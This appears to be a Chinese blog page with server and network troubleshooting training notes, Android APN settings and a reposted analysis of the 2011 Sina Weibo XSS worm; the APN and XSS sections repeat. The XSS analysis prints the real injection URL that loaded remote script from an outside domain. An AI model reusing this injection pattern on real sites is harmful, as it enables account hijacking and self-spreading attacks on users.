上月时,一时心血来潮,想将自己所知,自己所了解这几年来的服务器维护经验做下小结。
是以答应培训发展部,给部门成员进行几次培训。
主要内容有:服务器故障的应急处理及网络故障分析
Dns架构与常识
技术人员效率提升之简单办法
分三次培训,每次1小时。
原以为这些都是些经验之谈,写起培训档来,应该没什么问题。
没想到真正动手的时候,才发现。自己还未达到高屋建瓴的高度。并不是如自己所想的那样可以做到随手拎来~
大致写完培训档后才发现,很多平时常用的指令,我们并不深解其原理。如traceroute~
其实关于培训,受益最大的应该是培训师,在每一次对别人进行培训时,其收益远大于受训者~
培训在我看来是一种经验之谈。其实每个人都有可当培训师的潜质。可惜因种种原因,很多人浪费了。
培训别人是一种沟通过程,是一种学习过程,一种交流与成长的过程。有好的东西能拿出来分享,是体现自己我价值,提高认知的很好途径。
例如今天准备的服务器故障应急处理与网络故障分析。其重点就是一种思路。一种对网络问题的判断思路。
服务器维护工具不重要,意识与责任才是重要的。通过这次的培训文档的准备,让我对traceroute的原理、基本表现、及侦听的数据有一个较深入的了解。
对之前认为怪异的路由信息,变得不再怪异了。
很多时候,问题能够解决。但我们却不知道是因为什么而解决了~
要写培训档时~这原因或许就可以解决了。道理很简单,你总不至于想被别人问得下不了台吧~
部分内容介绍:
对网络故障及服务器故障的准确判断是作为一个合格的网管的必备技能。只有知道问题才能解决问题,如何在最短的时间确定故障点或问题点,如何使用网络故障诊断工具是本次培训的主要内容。
1.故障处理流程与思路
2.网络故障诊断
3.服务器故障诊断
4.故障重演与演示
故障出现后,理出一个判断流程与思路至关重要。特别的网络故障,若没有一个很好的思路,则会越测试得到越多的结果就越乱,对问题越不能确定。是以在故障出现后,对每个测试,我们都必需有一个确定的目标。这与做事是一致的。有目标,制定行动骤,再用一个个的测试来核实。以确定问题点。很多时候,这些行动都是在我们脑里一晃而过,这些是经验。但归纳后,你的效率就会更高。对问题的了解就越彻底~具体对思路的了解我会结合网络故障诊断来分析。但一个基本思路是:结论是什么?依据是什么?360方位的测试结果是什么?
1.1故障描述。问题发生时,对故障的描述信息收集的越详细越好。(网站域名不能访问?服务器ip能不能正常ping通,或哪些地方能通哪些地方不能通?服务器所在同网段内网能不能正常ping通,服务器有没有到达正常的登陆界面?)
1.2依据故障的描述,分析大概的几种可能情况,制定测试方案(一般是在大脑中确认。有经验与没有经验在这一点上很能体现问题)。再据测试结果分析。
1.3一般常见故障与沟通技巧。测试点的选择,路由测试到哪一跳,这一跳对的物理方位。在沟通时,需要对方帮你确认的信息与内容是什么?具体要对方帮我们什么?
360测试方式:
如我们最常见的服务器当机情况。发现服务器监控机报警了,服务器连不上了。我们先用ping测试,看服务器是否可达?-》无返回数据包-》做路由测试(确认是公司内部问题或是网络哪个节点问题,若是最后一跳是到idc的路由ip,则确定是idc方面问题。-》再到同一机房同网段内的机器上进行ping测试。确认内网是否是正常的。)这就是所谓的我认为的360测试方式。逻辑原则是:外-》外-》内-》内
利用cacti流量监控/ipmonitor监控等。
提供给idc的资料内容:路由测试、路由比对测试、内网测试结果,丢包率,测试点。
技术描述禁忌与建议:
故障描述。问题发生时,对故障的描述信息收集的越详细越好。(网站域名不能访问?服务器ip能不能正常ping通,或哪些地方能通哪些地方不能通?服务器所在同网段内网能不能正常ping通,服务器有没有到达正常的登陆界面?)
依据故障的描述,分析大概的几种可能情况,制定测试方案(一般是在大脑中确认。有经验与没有经验在这一点上很能体现问题)。再据测试结果分析。
一般常见故障与沟通技巧。测试点的选择,路由测试到哪一跳,这一跳对的物理方位。在沟通时,需要对方帮你确认的信息与内容是什么?具体要对方帮我们什么?
常见工具的使用:ping, netstat, tracert/traceroute, route add,nmap,lsof命令行的使用
常见故障的表现:arp攻击、国际出口故障、idc故障、dns故障、指向故障、公司内部出口故障的常见表征
3.Arp攻击表征:ping 丢包,整段网络问题或单台问题,同网段可ping,在相邻机器上查得arp –a时发现网关mac不一致。解决办法:tcpdump –nnnv arp 应该可以监听到arp攻击信息包。再通过nmap -sP 192.168.1.0/32 查整段的服务器mac来确认攻击源的真实ip地址。
Netstat –s查看具体机器上的数据包统计情况。
Tcpdump 常用侦听语法:
tcpdump -nnnv arp 查找ARP攻击时确定攻击原MAC地址时常用。
tcpdump -nnnv udp port 53 DNS服务器53端口受ARP攻击时查看攻击源时用。
tcpdump -nnnv udp and not port 53 可以确定是否有非53端口的大流量UDP攻击
tcpdump -nnnv port 80 and host 192.168.0.1 找出从192.168.0.1的80端口收到或发送的IP包。
tcpdump -nnnv host ! 192.168.15.129 and ! 192.168.15.130 and dst port 80
捕获除了主机192.168.15.129与192.168.15.130 且到本机目标80端口的数据包。
tcpdump -nnnv src 192.168.15.129 and port 53 捕获由192.168.15.129到本机53端口的数据包。不管是UDP还是TCP
服务器故障:
这里说的服务器故障指:路由的最后一跳节点在idc网关处理的所有故障。包括:硬件故障、启动故障、软件设置故障等。一般需要IDC帮忙进行处理的所有故障判断。此部分故障目前大部分由系统集成部来承担。这里只介绍几点基本的处理方法。
2.常见的硬件故障有:RAID故障,磁盘故障,电源故障。一般在启动过程需要人工干预。
3.常见的软件故障主要有:重启或掉电引发的文件系统故障。
4.系统日志是解决软件故障的重要依据。无论是什么系统,在出现异常后,首先要查看的就是日志。
2011年8月17日星期三
手机无法上网的设置
联通用户:名称:3gwap
APN:3gwap
代理:10.0.0.172
端口:80
用户名:空
密码:空
服务器:空
MMSC:http://mmsc.myuni.com.cn
彩信代理:010.000.000.172
彩信端口:80
彩信协议:wap 2.0
MCC:460
MNC:01
APN类型:mms
按menu键,保存;
---------------------------------------------------------------------------
按menu键――新APN
名称:3gnet
APN:3gnet
代理:空
端口:空
用户名:空
密码:空
服务器:空
MMSC:空
彩信代理:空
彩信端口:空
彩信协议:wap 2.0
MCC:460
MNC:01
APN类型:default
按menu键――保存。
移动用户:
名称:cmnet
APN:cmnet
端口:80
彩信协议:wap 2.0
APN类型:default
(其它项目全部默认即可,无需修改)
按menu键,保存;
-------------------------------------------------------------------
按menu键――新APN
名称:cmwap
APN:cmwap
代理:10.0.0.172
端口:80
MMSC:http://mmsc.monternet.com
彩信代理:010.000.000.172
彩信端口:80
彩信协议:WAP 2.0
APN类型:mms
(其它项目全部默认即可,无需修改)
按menu键――保存。
然后退回主页――电话――输入"*#*#4636#*#*"――手机信息――拉到最后――按一下"切换DNS检查"(显示
0.0.0.0 allowed)即可上网。必要时,可能需要重启手机。
APN:3gwap
代理:10.0.0.172
端口:80
用户名:空
密码:空
服务器:空
MMSC:http://mmsc.myuni.com.cn
彩信代理:010.000.000.172
彩信端口:80
彩信协议:wap 2.0
MCC:460
MNC:01
APN类型:mms
按menu键,保存;
---------------------------------------------------------------------------
按menu键――新APN
名称:3gnet
APN:3gnet
代理:空
端口:空
用户名:空
密码:空
服务器:空
MMSC:空
彩信代理:空
彩信端口:空
彩信协议:wap 2.0
MCC:460
MNC:01
APN类型:default
按menu键――保存。
移动用户:
名称:cmnet
APN:cmnet
端口:80
彩信协议:wap 2.0
APN类型:default
(其它项目全部默认即可,无需修改)
按menu键,保存;
-------------------------------------------------------------------
按menu键――新APN
名称:cmwap
APN:cmwap
代理:10.0.0.172
端口:80
MMSC:http://mmsc.monternet.com
彩信代理:010.000.000.172
彩信端口:80
彩信协议:WAP 2.0
APN类型:mms
(其它项目全部默认即可,无需修改)
按menu键――保存。
然后退回主页――电话――输入"*#*#4636#*#*"――手机信息――拉到最后――按一下"切换DNS检查"(显示
0.0.0.0 allowed)即可上网。必要时,可能需要重启手机。
2011年8月11日星期四
新浪微博跨站XSS攻击--其它人的分析
今天晚上(2011年6月28日),新浪微博出现了一次比较大的XSS攻击事件。大量用户自动发送诸如:"郭美美事件的一些未注意到的细节","建党大业中穿帮的地方","让女人心动的100句诗歌","3D肉团团高清普通话版种子","这是传说中的神仙眷侣啊","惊爆!范冰冰艳照真流出了"等等微博和私信,并自动关注一位名为hellosamy的用户。
事件的经过线索如下:
20:14,开始有大量带V的认证用户中招转发蠕虫
20:30,2kt.cn中的病毒页面无法访问
20:32,新浪微博中hellosamy用户无法访问
21:02,新浪漏洞修补完毕
新浪微博XSS事件
在这里,想和大家介绍一下XSS攻击,XSS攻击又叫跨站脚本式攻击,你Google一下可以搜到很多很多的文章。我在这里就简单地说一下。
首先,我们都知道网上很多网站都可以"记住你的用户名和密码"或是"自动登录",其实是在你的本地设置了一个cookie,这种方式可以让你免去每次都输入用户名和口令的痛苦,但是也带来很大的问题。试想,如果某用户在"自动登录"的状态下,如果你运行了一个程序,这个程序访问"自动登录"这个网站上一些链接、提交一些表单,那么,也就意味着这些程序不需要输入用户名和口令的手动交互就可以和服务器上的程序通话。这就是XSS攻击的最基本思路。
再说一点,不一定是"记住你的用户名和密码"或是"自动登录"的方法,因为HTTP是无状态的协议,所以,几乎所有的网站都会在你的浏览器上设置cookie来记录状态,以便在其多个网页切换中检查你的登录状态。而现在的浏览器的运行方式是多页面或多窗口运行,也就是说,你在同一个父进程下开的多个页面或窗口里都可以无偿和共享使用你登录状态的。
当然,你不必过于担心访问别的网站,在别的网站里的js代码会自动访问你的微博或是网银。因为浏览器的安全性让js只能访问自己所在网站的资源(你可以引入其它网站的js)。当然,这是浏览器对js做的检查,所以,浏览器并不一定会做这个检查,这就是为什么IE6是史上最不安全的浏览器,没有之一。只要你没有在用IE6,应该没有这些问题。
XSS攻击有两种方法,
一种就像SQL Injection或CMD Injection攻击一样,我把一段脚本注入到服务器上,用户访问方法服务器的某个URL,这个URL就会把远端的js注入进来,这个js有可能自动进行很多操作。比如这次事件中的帮你发微博,帮你发站内消息等。注入有很多方法,比如:提交表单,更改URL参数,上传图片,设置签名,等等。
另一类则是来来自外部的攻击,主要指的自己构造XSS 跨站漏洞网页或者寻找非目标机以外的有跨站漏洞的网页。如当我们要渗透一个站点,我们自己构造一个跨站网页放在自己的服务器上,然后通过结合其它技术,如 社会工程学等,欺骗目标服务器的管理员打开。这一类攻击的威胁相对较低,至少ajax 要发起跨站调用是非常困难的(你可能需要hack浏览器)。
这次新浪微博事件是第一种,其利用了微博广场页面 http://weibo.com/pub/star 的一个URL注入了js脚本,其通过http://163.fm/PxZHoxn短链接服务,将链接指向:
http://weibo.com/pub/star/g/xyyyd%22%3E%3Cscript%20src=//www.2kt.cn/images/t.js%3E%3C/script%3E?type=update
注意,上面URL链接中的其实就是<script src=//www.2kt.cn/images/t.js></script>。
攻击者并不一定是2kt.cn的人,因为.cn被国家严格管制(大家不知道coolshell.cn 的备案备了不知有多少次),所以,我个人觉得这个人不会愚蠢到用自己域名来做攻击服务器。
其它
初步发现 Chrome 和 Safari 都没中招。IE、Firefox未能幸免。
史上最著名的XSS攻击是Yahoo Mail 的Yamanner 蠕虫是一个著名的XSS 攻击实例。早期Yahoo Mail 系统可以执行到信件内的javascript 代码。并且Yahoo Mail 系统使用了Ajax技术,这样病毒javascript 可以的向Yahoo Mail 系统发起ajax 请求,从而得到用户的地址簿,并发送攻击代码给他人。
为什么那个用户叫hellosamy,因为samy是第一个XSS攻击性的蠕虫病毒,在MySpace上传播。
关于攻击的代码在这里:06.28_sina_XSS.txt (编码风格还是很不错的)
(全文完)
事件的经过线索如下:
20:14,开始有大量带V的认证用户中招转发蠕虫
20:30,2kt.cn中的病毒页面无法访问
20:32,新浪微博中hellosamy用户无法访问
21:02,新浪漏洞修补完毕
新浪微博XSS事件
在这里,想和大家介绍一下XSS攻击,XSS攻击又叫跨站脚本式攻击,你Google一下可以搜到很多很多的文章。我在这里就简单地说一下。
首先,我们都知道网上很多网站都可以"记住你的用户名和密码"或是"自动登录",其实是在你的本地设置了一个cookie,这种方式可以让你免去每次都输入用户名和口令的痛苦,但是也带来很大的问题。试想,如果某用户在"自动登录"的状态下,如果你运行了一个程序,这个程序访问"自动登录"这个网站上一些链接、提交一些表单,那么,也就意味着这些程序不需要输入用户名和口令的手动交互就可以和服务器上的程序通话。这就是XSS攻击的最基本思路。
再说一点,不一定是"记住你的用户名和密码"或是"自动登录"的方法,因为HTTP是无状态的协议,所以,几乎所有的网站都会在你的浏览器上设置cookie来记录状态,以便在其多个网页切换中检查你的登录状态。而现在的浏览器的运行方式是多页面或多窗口运行,也就是说,你在同一个父进程下开的多个页面或窗口里都可以无偿和共享使用你登录状态的。
当然,你不必过于担心访问别的网站,在别的网站里的js代码会自动访问你的微博或是网银。因为浏览器的安全性让js只能访问自己所在网站的资源(你可以引入其它网站的js)。当然,这是浏览器对js做的检查,所以,浏览器并不一定会做这个检查,这就是为什么IE6是史上最不安全的浏览器,没有之一。只要你没有在用IE6,应该没有这些问题。
XSS攻击有两种方法,
一种就像SQL Injection或CMD Injection攻击一样,我把一段脚本注入到服务器上,用户访问方法服务器的某个URL,这个URL就会把远端的js注入进来,这个js有可能自动进行很多操作。比如这次事件中的帮你发微博,帮你发站内消息等。注入有很多方法,比如:提交表单,更改URL参数,上传图片,设置签名,等等。
另一类则是来来自外部的攻击,主要指的自己构造XSS 跨站漏洞网页或者寻找非目标机以外的有跨站漏洞的网页。如当我们要渗透一个站点,我们自己构造一个跨站网页放在自己的服务器上,然后通过结合其它技术,如 社会工程学等,欺骗目标服务器的管理员打开。这一类攻击的威胁相对较低,至少ajax 要发起跨站调用是非常困难的(你可能需要hack浏览器)。
这次新浪微博事件是第一种,其利用了微博广场页面 http://weibo.com/pub/star 的一个URL注入了js脚本,其通过http://163.fm/PxZHoxn短链接服务,将链接指向:
http://weibo.com/pub/star/g/xyyyd%22%3E%3Cscript%20src=//www.2kt.cn/images/t.js%3E%3C/script%3E?type=update
注意,上面URL链接中的其实就是<script src=//www.2kt.cn/images/t.js></script>。
攻击者并不一定是2kt.cn的人,因为.cn被国家严格管制(大家不知道coolshell.cn 的备案备了不知有多少次),所以,我个人觉得这个人不会愚蠢到用自己域名来做攻击服务器。
其它
初步发现 Chrome 和 Safari 都没中招。IE、Firefox未能幸免。
史上最著名的XSS攻击是Yahoo Mail 的Yamanner 蠕虫是一个著名的XSS 攻击实例。早期Yahoo Mail 系统可以执行到信件内的javascript 代码。并且Yahoo Mail 系统使用了Ajax技术,这样病毒javascript 可以的向Yahoo Mail 系统发起ajax 请求,从而得到用户的地址簿,并发送攻击代码给他人。
为什么那个用户叫hellosamy,因为samy是第一个XSS攻击性的蠕虫病毒,在MySpace上传播。
关于攻击的代码在这里:06.28_sina_XSS.txt (编码风格还是很不错的)
(全文完)
订阅:
博文 (Atom)